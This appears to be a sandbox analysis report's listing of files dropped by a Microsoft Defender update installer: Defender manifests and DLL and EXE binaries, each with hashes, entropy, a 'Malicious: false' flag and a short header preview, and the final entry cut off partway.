SSDEEP:	192:/5mm9AfGjUa1rIL+FUVin2F/OZDfYj5YbAxqTSSS6S8SzSySovK1ZVuB:/5mm9AfGtML+Fws2Fo7m5YcxHKrVo
MD5:	B6D65A86FC1999A62DA10EA3C4CAD3E4
SHA1:	E79E97C04D8540A2005D21021F7781676E705BCD
SHA-256:	05B2BFD40FB3A344C3AE178C420A7FEA9595815CB1CC07843078112F5F551EAF
SHA-512:	7F13B4930F9BF9ABCFD64E905DA4F0111B34197A533FB0162E43C4C80F39D135ADAA09C3E7AF3E95397BEF5D1D323E75721CEE150517CB13EBED3029C781BEC6
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Drivers" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>... .. *********************************************************************************************************.. Driver files.. *********************************************************************************************************.. -->...<file destinationPath="$(runtime.drivers)" importPath="$(build.campBinaryImportPath)" name="WdFilter.sys" sourceName="WdFilter.sys" sourcePath=".\"></file>...<file destinationPath="$(runtime.drivers)" importPath="$(build.campBinaryImportPath)" name="WdBoot.sys" sourceName="WdBoot.sys" sou

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Microsoft-Antimalware-NIS.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	6173
Entropy (8bit):	5.373156847974759
Encrypted:	false
SSDEEP:	96:/3coK5HjFWr/96Hj+Uul2lewqo3nRtlUl3lflxSDwMKRbRhK18YaKMr4e:/mDFcujBuEgI3nzC1Z6V8f3
MD5:	5562965C32F03AE0DF8B9DEF950F8651
SHA1:	6E5AD734AB6A9F8B82B19024E21007AC2CAD2540
SHA-256:	EA64BE59286B67AE930729FA92B2B08DCE5C2EAEB70FEABE2320C47FB6DDAC6C
SHA-512:	F64D728AFE40800968D0B165019E775F62F2CCA40BFBB370F52F4BA8FCC2574F79D2C4AC41CCAE6E1CEC23082BA24B5E6C0A5531E6B336683BEEEDDA3CB81CDE
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-NisSrvEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{102aab0a-9d9c-4887-a860-55de33b96595}" message="$(string.Microsoft-Antimalware-NIS.provider.name)" messageFileName="%ProgramFiles%\Windows Defender\NisSrv.exe" name="Microsoft-Antimalware-NIS" resourceFileName="%ProgramFiles%\Windows Defender\NisSrv.exe" symbol="Microsoft_Antimalware_NIS">......<tasks>.......<task eventGUID="{b33e041e-3a75-4f52-bf0e-c85d0963b7fb}" name="N

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Microsoft-Antimalware-Protection.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	3369
Entropy (8bit):	5.312049604455802
Encrypted:	false
SSDEEP:	96:/3poK58yFND08uf9zXzUzCzwat0kz9nHHzyPYjHMrje:/FbFHuf9DzUOVJ1HHePv2
MD5:	E4AD891E7B62475FCA109C0DF4DEF16E
SHA1:	B7DC3C04C67D7903E04B0EBF2AB7840AAA717EE0
SHA-256:	DF9AD93CDB61587A35FCDCE996955A64413439A474D85C86133A9E9C185D1966
SHA-512:	0849CB6F3DAA6C80B94F770E29BD389B67D31E089595B22BFAF1D6F25C6E847DA4DCBFF135F6D96E30597991FF6C8CA8EB5306C4E8D1B334016220058B2969E1
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-MpClientEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{e4b70372-261f-4c54-8fa6-a5a7914d73da}" message="$(string.Microsoft-Antimalware-Protection.provider.name)" messageFileName="%programfiles%\Windows Defender\MpClient.dll" name="Microsoft-Antimalware-Protection" resourceFileName="%programfiles%\Windows Defender\MpClient.dll" symbol="Microsoft_Antimalware_Protection">......<tasks>.......<task eventGUID="{7db81ddd-d2be-41bd-

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Microsoft-Antimalware-RTP.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12885
Entropy (8bit):	5.3652290431980765
Encrypted:	false
SSDEEP:	192:/ozFIItP1HvYoPp5z7YlAZSJwyygPJ2HBfEj:/QFIwP1PYoh5WAZSJwsJ2NC
MD5:	35AC30A8637BC0EB2F7902B8C69BF904
SHA1:	DB4C458A6007F444AECF8F4C49E481CC9935B22C
SHA-256:	FE761134076253DC11CF8C154CA43E762C61C28D0A817E76351FFEF32CCF59C0
SHA-512:	E41E522BF542D3B662D741E04523D1140C66585B64E811F6CD27C74466156F2FB728890C73579D4CFAD0BF8758D4F699A79C5B0B4B98479D60D386ACC26A8C49
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-MpRtpEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{8e92deef-5e17-413b-b927-59b2f06a3cfc}" message="$(string.Microsoft-Antimalware-RTP.provider.name)" messageFileName="%programfiles%\Windows Defender\MpRtp.dll" name="Microsoft-Antimalware-RTP" resourceFileName="%programfiles%\Windows Defender\MpRtp.dll" symbol="Microsoft_Antimalware_RTP">......<maps>.......<valueMap name="DlpOperationType">........<map message="$(string.Ope

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Microsoft-Antimalware-Service.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	31904
Entropy (8bit):	5.2624632476710405
Encrypted:	false
SSDEEP:	384:/VFriW4cboWcauSi6fZeeCifUhwqh+46AJJCZvsp33icjEtFBR2EaXU1Hgb1RVxq:tFriHcblBLuJ1ycgtR6XNxB4
MD5:	B003B1DFFD9221745ED31E2979B28574
SHA1:	FBCEB9767657E596CEA5E29EBDA57207F5B08A5D
SHA-256:	5AE7493F638252D49F18B084D7CEA4E88D3AF6B1170C8C16EABF5C6AE849E3C9
SHA-512:	B731F60AC20548A54C465BFC3B20334946A384895C8AA4DF4C1DA969FB71F4B7C1BEC50044C4C5A9555B68B68C8A96EC45AE78FC5EBCD406102AE144A737FF02
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-MpSvcEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:ms="http://manifests.microsoft.com/win/2004/08/windows/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{751ef305-6c6e-4fed-b847-02ef79d26aef}" message="$(string.Microsoft-Antimalware-Service.provider.name)" messageFileName="%programfiles%\Windows Defender\MpSvc.dll" name="Microsoft-Antimalware-Service" resourceFileName="%programfiles%\Windows Defender\MpSvc.dll" symbol="Microsoft_Antimalware_Service">......

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Microsoft-Windows-Windows Defender.man Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	149152
Entropy (8bit):	5.478121035794876
Encrypted:	false
SSDEEP:	1536:5oQofFA+1KSYfSN8bvc0/E/EvJ4rXVEc+ICO+PV5FqGc9HCOKK1HVX:SBfErIHKK1HVX
MD5:	36F8A68EECFB5B89C4C571F6A63E3ECA
SHA1:	242DC76813FE0BE2E676D37538FD887292803E68
SHA-256:	4D76246642181E38F87B623AF82BF7454050D05775F546506CFACA1608BE9633
SHA-512:	C483FCE988F96156FAAACA093F1CE948B0CC42C006012F6F29308F4ED09D295951F59C79A547341578616E58561CAF858135881AF305B3166E1D4474B48D35C8
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Events" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<dependency discoverable="false" optional="false" resourceType="Resources">....<dependentAssembly>.....<assemblyIdentity buildType="release" language="" name="Windows-Defender-Events.Resources" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384"></assemblyIdentity>....</dependentAssembly>...</dependency>... .. ********************************************************************************************************.. BEGIN FILES SECTION .. *********************************************************************************************************.. --

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpAsDesc.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	209144
Entropy (8bit):	5.205036912846813
Encrypted:	false
SSDEEP:	6144:PmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJL:tr
MD5:	A27F0ABF90F3B468C6F15CDAFBBC3312
SHA1:	D75B9FD570E9650F583F15F0F0F37EB2CBC39EC4
SHA-256:	503DF4EF842D6621139D4A15D68955E4926C0C6B5CCCEF60323290A6FC08343F
SHA-512:	9716144577A19591E12BB10732FF135D00928D1C5951AB220057A4A00D42B74E8980825D6DD60A8486EE1EC75CBAEA7C5525D4F4E600F5F869BEABA53C7D5FE2
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..d....z..........." ......................................................................`A......................................................... ................... ..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpAzSubmit.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1409272
Entropy (8bit):	6.2399898718653075
Encrypted:	false
SSDEEP:	24576:5k4dJL+FQJApr2tz1+lC2zxw6y2os4OXB7vcHFzqh7OcI:5k4dJK+Jur2tz1+lC2VO2osDy
MD5:	C10F256B7606EE5B1BED880020F68912
SHA1:	76B51FDD50A3EEBD4B55D97E3C9A8B8C79EDF978
SHA-256:	C649EC99F87F684D22157755E5F8E0AF7C1EFD54853493965A673A3F0FFB4AC6
SHA-512:	A5A9C4190A831D1FE2EADD1AB9FE97A0BE39FE4EE97A0F223D0AC42E80C72FA2B77AA0D2F929A3B2F10E7AB4E850BC7DF1DE420CAFD7289C08C763D951D997CB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........`J.v3J.v3J.v3..u2K.v3..w2Y.v3J.w3u.v3..u2Y.v3..r2a.v3..s2..v3..3H.v3..v2K.v3...2.v3..3K.v3..t2K.v3RichJ.v3................PE..d................" .....P... .................f....................................r4....`A........................................`b.......c.......@.......@.......`... ...P...,..\|k..p.......................(.......8............................................text...HO.......P.................. ..`.rdata..$....`... ...`..............@..@.data...8...........................@....pdata.......@....... ..............@..@.rsrc........@....... ..............@..@.reloc...,...P...0...0..............@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpClient.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1151224
Entropy (8bit):	6.1798062394748685
Encrypted:	false
SSDEEP:	24576:MLG0IKv+HzAmqQBrTPQWNRIyQhZBcfy0RkgJ:cGFu+HzAmqEQWNRIypfy0J
MD5:	FD7D2158F21085FF8E8C46829839708E
SHA1:	1749008645208E9769DD68D36124113E71923F6D
SHA-256:	DE50D8BB61B7F0BB423E4A50A6775192C4809F63C18BE9426C4AC2E127BB9DA9
SHA-512:	03707AEAF1FED4C2BDC2CA4167498C5F7C57153A47F386D9C6A7A0DF75CD5B3C54D01A42AB56B6FDBF9A10E26213A6540FDE19F5036DC8E659500F19D728AFF0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................V..........................................?.............i.....V.......V........?......V.k.....V.......Rich............PE..d...f............." .................g.........[....................................3.....`A................................................8...T....@...............p... ...P...!......p...................(o..(.......8...........Po...............................text............................... ..`.rdata...R.......`..................@..@.data...............................@....pdata..............................@..@.didat.......0....... ..............@....rsrc........@.......0..............@..@.reloc...!...P...0...@..............@..B................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCmdRun.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	884544
Entropy (8bit):	6.103389158363899
Encrypted:	false
SSDEEP:	12288:b1SQ6UqCplyaRffknhoV55jmvuN7Wk0mCBRUe:b+UbnkhoVLmvuNqBGe
MD5:	D50CBCB0B8B3282CD169E0032361D418
SHA1:	948E0431282837D2E654BFD805461967B99E63B4
SHA-256:	F7B6EB6E4D8E04C7243AB0AB73CEC6E20E980F07E03267ED4B0CA69CF9CDAB3D
SHA-512:	13184B5DFD5E82C44F1451AD426B7FB8ACE63923679D4210C3B2CACE6691DBACD113E9D55FFB041D1C79C46A80C128EE5D2A97E874487A938DBCF08C03A1C3EC
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............`...`...`..z....`..z....`..&....`..&....`....l..`..&....`..&....`...`...b..z...I`......`..z....`..z....`..Rich.`..........................PE..d................"..........0.................@.............................P.......j............... ..............................................p..........,O...@..@?...@..........p....................J..(....(..8...........@J......8........................text...[........................... ..`.rdata..>.... ....... ..............@..@.data....M.......@..................@....pdata..,O.......P..................@..@.didat.......`.......P..............@....rsrc........p.......`..............@..@.reloc.......@.......0..............@..B........................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCommu.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	352504
Entropy (8bit):	6.026593673622959
Encrypted:	false
SSDEEP:	6144:yOoa9kPfLM055gj5qDj8qdzRf8IGRx7Ur9opJtwEKLoi7GG75li:yXHjgjELzRf4q9oduLR77i
MD5:	98DE76E6BD6919C81785F34F3E4E4025
SHA1:	9E1BF8C617D7D629623D16DE29889659F4623066
SHA-256:	A5D1C85E15E4454D0CF4E613107F688B540A046659F1DDECA859B395335BD50D
SHA-512:	5F233E59E8C4BB320C5BCD42505300EFEAA519FE35B1877A7213CB471162A1BB613C027FBDB1126FB6E747A704CDE4D799FC4421808819650126D4A9EB282557
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........I...I...I......K......H.......E.......G.......A...@.o.X...I...........e......H.............H......H...RichI...................PE..d....5.}.........." ................`..........f.............................P......n.....`A........................................................0...........,...@... ...@..(...l...p...................H...(.......8...........p...............................text...5........................... ..`.rdata........... ..................@..@.data....#....... ..................@....pdata...,.......0..................@..@.didat..X.... ......................@....rsrc........0....... ..............@..@.reloc..(....@.......0..............@..B................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCopyAccelerator.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	165576
Entropy (8bit):	5.403399700794782
Encrypted:	false
SSDEEP:	3072:Obc/k/710XdiWNGKTeoKeMK9OQWExQc5W:OIM/72IWb9n9OQWEno
MD5:	B613F7C352DB0471338A01FA7CF94521
SHA1:	04618A6DD7100D957E6B190F70C263F1FF775CAB
SHA-256:	71ABD7C64E51AF9A750A31BAC218F9E6781C913869D97AA4024C2456E101CB20
SHA-512:	0D538585A972252EF6FF99C3ABB8F682201EE33A0FDFADB5BDCBEEE65E38D2C64BF8893B1691276ABF8F44303309BECF89AE0E74C3248609FB93FA22A6CD8F5D
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................F......F.......B....F......F..................................Rich....................PE..d.....J..........."..........P................@.............................`....................... .......................................Z..................<....`...&...P..4....8..p.......................(.......8...........8................................text............................... ..`.rdata...].......`..................@..@.data........p.......p..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc..4....P.......P..............@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDetours.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	164088
Entropy (8bit):	5.889246599238573
Encrypted:	false
SSDEEP:	3072:LhAcjxmGnxakZmOpjZrppk4sGFO5SVyT+/t5xRbOz8kKbc/3u:LKc4GnQeVaGs5ZgbRk6cG
MD5:	6694C427D876FEEC65126E7734886E88
SHA1:	F6F08ADEEA556B241E4010F538DA7E6C32047628
SHA-256:	A76E653BA8D251379133B748B685C08672A69D1CF95493549E563CFAD8A8D7A5
SHA-512:	620A52BF3D503B82D82799C48A23CF4AA8BD7E399C343192EDB52E28FA6815976C90621D1B2E5EB841B0711F5F4191BFB141529CC341EAA215A8905A65FA0010
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:Q..~0t.~0t.~0t..Ew..0t..Bu.n0t..Bp.r0t..Bw.y0t.wH.q0t.~0u.M1t..Bq.W0t..Et..0t..E}.60t..E...0t..Ev..0t.Rich~0t.................PE..d.....x..........." .........................................................p............`A.........................................................P.......0.......`... ...`......@...p.......................(...`...8............................................text....v.......................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ... ..............@..@.rsrc........P.......@..............@..@.reloc.......`.......P..............@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDetoursCopyAccelerator.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	102632
Entropy (8bit):	5.416424506292462
Encrypted:	false
SSDEEP:	1536:dnC8TM3nUZtTOwts7XxhrTNCfDgFvFJ2m6K2mPegHPxG:ZTM3UZtTOwW7XTNCfDGdBx2mPeqk
MD5:	50E2C916D6B2E5CDCED1BF18BEF5B9E6
SHA1:	523DA8427550B397352D0C7D9770BBE57E31C5CD
SHA-256:	C880E519887E5AFD35612BDAF4F987D79ED294050A4D291B54B18F7F3C80A89D
SHA-512:	C95F1D480DC1EF5587C9B9CE89F9C58550B2CD7E1E2389DE3A02DFBF541C9BBF66AFEC724767B574C81236FF0F5AE9C25D99702BA76FFC214290536C32BD6F3D
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s.v. .v. .v. U..!.v. ...!.v. ...!.v. ...!.v. ..U .v. .v. .w. ...!.v. U..!.v. U..!.v. U.9 .v. U..!.v. Rich.v. ........PE..d...F[.S.........." .................^...............................................j....`A........................................0...H...x........`..X....P.......p... ...p..........p...................h...(...0...8...............0............................text...R........................... ..`.rdata..*W.......`..................@..@.data........0.......0..............@....pdata.......P.......@..............@..@.rsrc...X....`.......P..............@..@.reloc.......p.......`..............@..B........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDlpCmd.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	372176
Entropy (8bit):	5.810540726487847
Encrypted:	false
SSDEEP:	6144:SqKvKD0BvxUWJsoyvdnja6lHfF2tZLmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVi:jyBWGxyvmR1
MD5:	9DA1C405AF787EFBAF735B76388F867F
SHA1:	7C9F2DD2C72A15B2954534BB7021C9DB3F850DA1
SHA-256:	7E7180B5534BE4BF2E531DCCE4BD8C0CB55EEC93759625283A162C0F6149464F
SHA-512:	66190E1EA2D6FA7EE048D204746216B8C8146C0F17114CA1651B566632F32970F2F6113131338D96D43FDCA33A9266D142016DCD6369F27CE6657DF12FB823E5
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.8...k...k...k7v.j...k7v.j...kkq.j...kkq.j...k.{sk...kkq.j...kkq.k...kkq.j...k...k...k7v.j...k7v.k...k7v.j...kRich...k................PE..d...V..F.........."..................9.........@....................................y................ ......................................4...@....p.......P..<........-......l...P...p.......................(...`...8...............h............................text...E........................... ..`.rdata...}..........................@..@.data........0.......0..............@....pdata..<....P... ...@..............@..@.rsrc........p.......`..............@..@.reloc..l............p..............@..B........................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpEvMsg.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	143608
Entropy (8bit):	3.8404828233814126
Encrypted:	false
SSDEEP:	768:7r/gwWulQnuBkG22Tumo0cTH6QKqCmuKqrWmNKq4mZKqdmjd4KqgmXyGgR1PRGzm:QIBkG2usKoHPim
MD5:	E6BA4B06A514B05F1A6F67E02776CB12
SHA1:	40CE66816509483AD45B8B6DE05D5F9AC23671CB
SHA-256:	3E69F409180506A6636CA8F0620AB0CC9B57F1393AC5986CC8BBE50BEF12C9C2
SHA-512:	C8DDB425AEA945C86742ED8E8940E655BC24AB66EE4FAEDB7F29FA7A187809DABD326A529777691481E53C55D5119402D4016CDED33919840AC98D9C636C3022
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..d................." ......................................................................`A......................................................... ................... ..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpOAV.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	495848
Entropy (8bit):	6.009124528357715
Encrypted:	false
SSDEEP:	6144:l7A3ZwUGB8s0MYG75D5DU3b9EV0ShqJULr0XVCOPmiTVVmVVV8VVNVVVcVVVxVVV:lk3a7J5DS9EV0MqJULrkkMo
MD5:	507A1C4DC135D31E60E46C911F518352
SHA1:	94D0E5C74AD632CDE21A967FD6A06999153B6CC7
SHA-256:	07AA7775DEC86AFEF867C3B902BCF47CCB36E224433171EB6C4C0E3D80F753AB
SHA-512:	FD980B28BA5E60536D695707716B4AC5B2AD63EEF1AF82534B326E2DBF6CA349DDA189C70CAF638C2AB6C3D6EB187F3C613FC5097C645C4272D9C60E8E2BE305
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........M...#...#...#.v. ...#.."..#..."..#..'..#.. ...#..&.>.#.v.#...#.v.*..#.v.....#.v.!...#.Rich..#.........PE..d...A............." ..........................._..........................................`A................................................D...x............`...#...p... ......t.......p....................8..(...P7..8............8..p............................text..."........................... ..`.rdata..............................@..@.data....0... ... ... ..............@....pdata...#...`...0...@..............@..@.rsrc................p..............@..@.reloc..t............`..............@..B................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpRtp.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1478904
Entropy (8bit):	6.324410065456569
Encrypted:	false
SSDEEP:	24576:43IcInwFd0DDgUkXbikt2m94TdJdiLyvBW+IYHMb1ie:4YrvDDgsm2mWJdiLiBWZQMb1ie
MD5:	EABFAF1CE6CB8843DA42FBA01E8BF069
SHA1:	ADBD3EF5C4EBD0D395B157489A3B5D34EAB8CFFF
SHA-256:	CA99B8EAA6ED8C706590551BE37107D027BBD53CC9E52805446ADF59B3AEDC1E
SHA-512:	AFF68BBE9B8A086E2E49BDBC864DE8FA8E5990F23F38B385CDEE56C189C52088B24DD492A779EA2ECDD751AB682B81041B674E854DCB190F8EBD10079FC1F68C
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H...)...)...)..M\...)..M\...)...[...)...)...(...[...)...[...)...[...)..M\...)..M\...)..M\W..)..M\...)..Rich.)..........PE..d....t`.........." ...........................^..........................................`A........................................P...d............ ...B...p.......p... ...p......`...p.......................(......8...........(.......4... ....................text....t.......................... ..`.rdata..^V.......`..................@..@.data...<p.......`..................@....pdata.......p.......P..............@..@.didat..X...........................@....rsrc....B... ...P..................@..@.reloc.......p... ...P..............@..B................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpSigStub.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	803176
Entropy (8bit):	6.37118649960636
Encrypted:	false
